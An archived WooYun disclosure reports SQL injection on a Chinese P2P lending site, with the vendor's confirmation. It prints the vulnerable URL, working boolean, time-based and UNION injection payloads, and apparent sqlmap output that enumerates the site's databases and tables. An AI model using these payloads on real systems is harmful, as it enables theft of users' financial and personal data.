P2P金融安全之财智魔方某漏洞全站用户数据告急

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113435

漏洞标题：P2P金融安全之财智魔方某漏洞全站用户数据告急

漏洞作者：路人甲

提交时间：2015-05-11 18:28

修复时间：2015-06-27 09:20

公开时间：2015-06-27 09:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-11：细节已通知厂商并且等待厂商处理中
2015-05-13：厂商已经确认，细节仅向厂商公开
2015-05-23：细节向核心白帽子及相关领域专家公开
2015-06-02：细节向普通白帽子公开
2015-06-12：细节向实习白帽子公开
2015-06-27：细节向公众公开

简要描述：

233

详细说明：

http://www.caizhimofang.com/Home/Answer/index?id=4
payload:
id=4%20AND%203*2*1%3d6%20AND%20367%3d367
id=4%20AND%203*2*2%3d6%20AND%20367%3d367
问题存在
数据库还是DBA权限

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4) AND 1241=1241 AND (3568=3568
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=4) AND (SELECT * FROM (SELECT(SLEEP(5)))UtTd) AND (8670=8670
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=4) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a6271,0x5a4f4c6c724567434f43,0x71766b7171),NULL,NULL-- 
---
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0.12
current user is DBA:    True
available databases [8]:
[*] bak
[*] bbs
[*] bjdev
[*] information_schema
[*] mysql
[*] newcfp
[*] performance_schema
[*] test
Database: bjdev
[4 tables]
+-----------------------------------+
| cy_wx_drawmessage                 |
| cy_wx_sharemessage                |
| cy_wx_users                       |
| cy_wx_vipmessage                  |
+-----------------------------------+
Database: bbs
[295 tables]
+-----------------------------------+
| pre_common_admincp_cmenu          |
| pre_common_admincp_group          |
| pre_common_admincp_member         |
| pre_common_admincp_perm           |
| pre_common_admincp_session        |
| pre_common_admingroup             |
| pre_common_adminnote              |
| pre_common_advertisement          |
| pre_common_advertisement_custom   |
| pre_common_banned                 |
| pre_common_block                  |
| pre_common_block_favorite         |
| pre_common_block_item             |
| pre_common_block_item_data        |
| pre_common_block_permission       |
| pre_common_block_pic              |
| pre_common_block_style            |
| pre_common_block_xml              |
| pre_common_cache                  |
| pre_common_card                   |
| pre_common_card_log               |
| pre_common_card_type              |
| pre_common_connect_guest          |
| pre_common_credit_log             |
| pre_common_credit_log_field       |
| pre_common_credit_rule            |
| pre_common_credit_rule_log        |
| pre_common_credit_rule_log_field  |
| pre_common_cron                   |
| pre_common_devicetoken            |
| pre_common_district               |
| pre_common_diy_data               |
| pre_common_domain                 |
| pre_common_failedip               |
| pre_common_failedlogin            |
| pre_common_friendlink             |
| pre_common_grouppm                |
| pre_common_invite                 |
| pre_common_magic                  |
| pre_common_magiclog               |
| pre_common_mailcron               |
| pre_common_mailqueue              |
| pre_common_member                 |
| pre_common_member_action_log      |
| pre_common_member_connect         |
| pre_common_member_count           |
| pre_common_member_crime           |
| pre_common_member_field_forum     |
| pre_common_member_field_home      |
| pre_common_member_forum_buylog    |
| pre_common_member_grouppm         |
| pre_common_member_log             |
| pre_common_member_magic           |
| pre_common_member_medal           |
| pre_common_member_newprompt       |
| pre_common_member_profile         |
| pre_common_member_profile_setting |
| pre_common_member_security        |
| pre_common_member_secwhite        |
| pre_common_member_stat_field      |
| pre_common_member_status          |
| pre_common_member_validate        |
| pre_common_member_verify          |
| pre_common_member_verify_info     |
| pre_common_member_wechat          |
| pre_common_member_wechatmp        |
| pre_common_myapp                  |
| pre_common_myinvite               |
| pre_common_mytask                 |
| pre_common_nav                    |
| pre_common_onlinetime             |
| pre_common_optimizer              |
| pre_common_patch                  |
| pre_common_plugin                 |
| pre_common_pluginvar              |
| pre_common_process                |
| pre_common_regip                  |
| pre_common_relatedlink            |
| pre_common_remote_port            |
| pre_common_report                 |
| pre_common_searchindex            |
| pre_common_seccheck               |
| pre_common_secquestion            |
| pre_common_session                |
| pre_common_setting                |
| pre_common_smiley                 |
| pre_common_sphinxcounter          |
| pre_common_stat                   |
| pre_common_statuser               |
| pre_common_style                  |
| pre_common_stylevar               |
| pre_common_syscache               |
| pre_common_tag                    |
| pre_common_tagitem                |
| pre_common_task                   |
| pre_common_taskvar                |
| pre_common_template               |
| pre_common_template_block         |
| pre_common_template_permission    |
| pre_common_uin_black              |
| pre_common_usergroup              |
| pre_common_usergroup_field        |
| pre_common_visit                  |
| pre_common_word                   |
| pre_common_word_type              |
| pre_connect_disktask              |
| pre_connect_feedlog               |
| pre_connect_memberbindlog         |
| pre_connect_postfeedlog           |
| pre_connect_tthreadlog            |
| pre_forum_access                  |
| pre_forum_activity                |
| pre_forum_activityapply           |
| pre_forum_announcement            |
| pre_forum_attachment              |
| pre_forum_attachment_0            |
| pre_forum_attachment_1            |
| pre_forum_attachment_2            |
| pre_forum_attachment_3            |
| pre_forum_attachment_4            |
| pre_forum_attachment_5            |
| pre_forum_attachment_6            |
| pre_forum_attachment_7            |
| pre_forum_attachment_8            |
| pre_forum_attachment_9            |
| pre_forum_attachment_exif         |
| pre_forum_attachment_unused       |
| pre_forum_attachtype              |
| pre_forum_bbcode                  |
| pre_forum_collection              |
| pre_forum_collectioncomment       |
| pre_forum_collectionfollow        |
| pre_forum_collectioninvite        |
| pre_forum_collectionrelated       |
| pre_forum_collectionteamworker    |
| pre_forum_collectionthread        |
| pre_forum_creditslog              |
| pre_forum_debate                  |
| pre_forum_debatepost              |
| pre_forum_faq                     |
| pre_forum_filter_post             |
| pre_forum_forum                   |
| pre_forum_forum_threadtable       |
| pre_forum_forumfield              |
| pre_forum_forumrecommend          |
| pre_forum_groupcreditslog         |
| pre_forum_groupfield              |
| pre_forum_groupinvite             |
| pre_forum_grouplevel              |
| pre_forum_groupuser               |
| pre_forum_hotreply_member         |
| pre_forum_hotreply_number         |
| pre_forum_imagetype               |
| pre_forum_medal                   |
| pre_forum_medallog                |
| pre_forum_memberrecommend         |
| pre_forum_moderator               |
| pre_forum_modwork                 |
| pre_forum_newthread               |
| pre_forum_onlinelist              |
| pre_forum_order                   |
| pre_forum_poll                    |
| pre_forum_polloption              |
| pre_forum_polloption_image        |
| pre_forum_pollvoter               |
| pre_forum_post                    |
| pre_forum_post_location           |
| pre_forum_post_moderate           |
| pre_forum_post_tableid            |
| pre_forum_postcache               |
| pre_forum_postcomment             |
| pre_forum_postlog                 |
| pre_forum_poststick               |
| pre_forum_promotion               |
| pre_forum_ratelog                 |
| pre_forum_relatedthread           |
| pre_forum_replycredit             |
| pre_forum_rsscache                |
| pre_forum_sofa                    |
| pre_forum_spacecache              |
| pre_forum_statlog                 |
| pre_forum_thread                  |
| pre_forum_thread_moderate         |
| pre_forum_threadaddviews          |
| pre_forum_threadcalendar          |
| pre_forum_threadclass             |
| pre_forum_threadclosed            |
| pre_forum_threaddisablepos        |
| pre_forum_threadhidelog           |
| pre_forum_threadhot               |
| pre_forum_threadimage             |
| pre_forum_threadlog               |
| pre_forum_threadmod               |
| pre_forum_threadpartake           |
| pre_forum_threadpreview           |
| pre_forum_threadprofile           |
| pre_forum_threadprofile_group     |
| pre_forum_threadrush              |
| pre_forum_threadtype              |
| pre_forum_trade                   |
| pre_forum_tradecomment            |
| pre_forum_tradelog                |
| pre_forum_typeoption              |
| pre_forum_typeoptionvar           |
| pre_forum_typevar                 |
| pre_forum_warning                 |
| pre_home_album                    |
| pre_home_album_category           |
| pre_home_appcreditlog             |
| pre_home_blacklist                |
| pre_home_blog                     |
| pre_home_blog_category            |
| pre_home_blog_moderate            |
| pre_home_blogfield                |
| pre_home_class                    |
| pre_home_click                    |
| pre_home_clickuser                |
| pre_home_comment                  |
| pre_home_comment_moderate         |
| pre_home_docomment                |
| pre_home_doing                    |
| pre_home_doing_moderate           |
| pre_home_favorite                 |
| pre_home_feed                     |
| pre_home_feed_app                 |
| pre_home_follow                   |
| pre_home_follow_feed              |
| pre_home_follow_feed_archiver     |
| pre_home_friend                   |
| pre_home_friend_request           |
| pre_home_friendlog                |
| pre_home_notification             |
| pre_home_pic                      |
| pre_home_pic_moderate             |
| pre_home_picfield                 |
| pre_home_poke                     |
| pre_home_pokearchive              |
| pre_home_share                    |
| pre_home_share_moderate           |
| pre_home_show                     |
| pre_home_specialuser              |
| pre_home_userapp                  |
| pre_home_userappfield             |
| pre_home_visitor                  |
| pre_mobile_setting                |
| pre_mobile_wechat_authcode        |
| pre_mobile_wsq_threadlist         |
| pre_portal_article_content        |
| pre_portal_article_count          |
| pre_portal_article_moderate       |
| pre_portal_article_related        |
| pre_portal_article_title          |
| pre_portal_article_trash          |
| pre_portal_attachment             |
| pre_portal_category               |
| pre_portal_category_permission    |
| pre_portal_comment                |
| pre_portal_comment_moderate       |
| pre_portal_rsscache               |
| pre_portal_topic                  |
| pre_portal_topic_pic              |
| pre_security_evilpost             |
| pre_security_eviluser             |
| pre_security_failedlog            |
| pre_ucenter_admins                |
| pre_ucenter_applications          |
| pre_ucenter_badwords              |
| pre_ucenter_domains               |
| pre_ucenter_failedlogins          |
| pre_ucenter_feeds                 |
| pre_ucenter_friends               |
| pre_ucenter_mailqueue             |
| pre_ucenter_memberfields          |
| pre_ucenter_members               |
| pre_ucenter_mergemembers          |
| pre_ucenter_newpm                 |
| pre_ucenter_notelist              |
| pre_ucenter_pm_indexes            |
| pre_ucenter_pm_lists              |
| pre_ucenter_pm_members            |
| pre_ucenter_pm_messages_0         |
| pre_ucenter_pm_messages_1         |
| pre_ucenter_pm_messages_2         |
| pre_ucenter_pm_messages_3         |
| pre_ucenter_pm_messages_4         |
| pre_ucenter_pm_messages_5         |
| pre_ucenter_pm_messages_6         |
| pre_ucenter_pm_messages_7         |
| pre_ucenter_pm_messages_8         |
| pre_ucenter_pm_messages_9         |
| pre_ucenter_protectedmembers      |
| pre_ucenter_settings              |
| pre_ucenter_sqlcache              |
| pre_ucenter_tags                  |
| pre_ucenter_vars                  |
+-----------------------------------+
Database: newcfp
[99 tables]
+-----------------------------------+
| cy_account                        |
| cy_activity                       |
| cy_activity_award                 |
| cy_admin                          |
| cy_admin_funds                    |
| cy_admin_funds_balance            |
| cy_answer                         |
| cy_area                           |
| cy_asset                          |
| cy_auth_address                   |
| cy_auth_car                       |
| cy_auth_cp                        |
| cy_auth_edu                       |
| cy_auth_estate                    |
| cy_auth_group                     |
| cy_auth_group_access              |
| cy_auth_group_user                |
| cy_auth_iden                      |
| cy_auth_job                       |
| cy_auth_log                       |
| cy_auth_marry                     |
| cy_auth_phone                     |
| cy_auth_rule                      |
| cy_auth_salary                    |
| cy_auth_title                     |
| cy_auth_video                     |
| cy_auth_weibo                     |
| cy_authrecord                     |
| cy_autobidsetup                   |
| cy_autobidstand                   |
| cy_award                          |
| cy_award_log                      |
| cy_award_user                     |
| cy_bank                           |
| cy_bankcard                       |
| cy_billno                         |
| cy_borrcheck                      |
| cy_borrmsg                        |
| cy_borrow                         |
| cy_borrow_draft                   |
| cy_borrowtype                     |
| cy_cardlist                       |
| cy_category                       |
| cy_choujiang                      |
| cy_city                           |
| cy_contract_pic                   |
| cy_credit                         |
| cy_credit_log                     |
| cy_creditdetail                   |
| cy_crights                        |
| cy_custbase                       |
| cy_email                          |
| cy_ent_pic                        |
| cy_enter_finareport               |
| cy_enterprice                     |
| cy_estate                         |
| cy_estate_pic                     |
| cy_family                         |
| cy_funds                          |
| cy_funds_balance                  |
| cy_fundtype                       |
| cy_gc                             |
| cy_gc_detail                      |
| cy_industry                       |
| cy_insurance                      |
| cy_insurance_pic                  |
| cy_lend                           |
| cy_member                         |
| cy_member_grade                   |
| cy_mempoints_log                  |
| cy_message                        |
| cy_modules                        |
| cy_news                           |
| cy_paydetail                      |
| cy_paymodel                       |
| cy_personal_pic                   |
| cy_phone_attribution              |
| cy_province                       |
| cy_question                       |
| cy_question_remark                |
| cy_question_tag                   |
| cy_redpackage                     |
| cy_reg                            |
| cy_score_rule                     |
| cy_shortmessage                   |
| cy_sign                           |
| cy_sms_list                       |
| cy_sms_user                       |
| cy_statistic_bid                  |
| cy_tags                           |
| cy_tempaccount                    |
| cy_union_account                  |
| cy_union_checklog                 |
| cy_union_reg                      |
| cy_withdrayapply                  |
| cy_workinfo                       |
| cy_wx_drawmessage                 |
| cy_wx_sharemessage                |
| cy_wx_users                       |
+-----------------------------------+
拿到用户信息，是不是就能登录用户去提现了？
土豪好多！！！

修复方案：

~~ 只是开玩笑，别敲门送温暖!

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-05-13 09:19

厂商回复：

多谢“路人甲”

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113435

漏洞标题：P2P金融安全之财智魔方某漏洞全站用户数据告急

相关厂商：caizhimofang.com

漏洞作者：路人甲

提交时间：2015-05-11 18:28

修复时间：2015-06-27 09:20

公开时间：2015-06-27 09:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113435

漏洞标题：P2P金融安全之财智魔方某漏洞全站用户数据告急

相关厂商：caizhimofang.com

漏洞作者： 路人甲

提交时间：2015-05-11 18:28

修复时间：2015-06-27 09:20

公开时间：2015-06-27 09:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113435"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云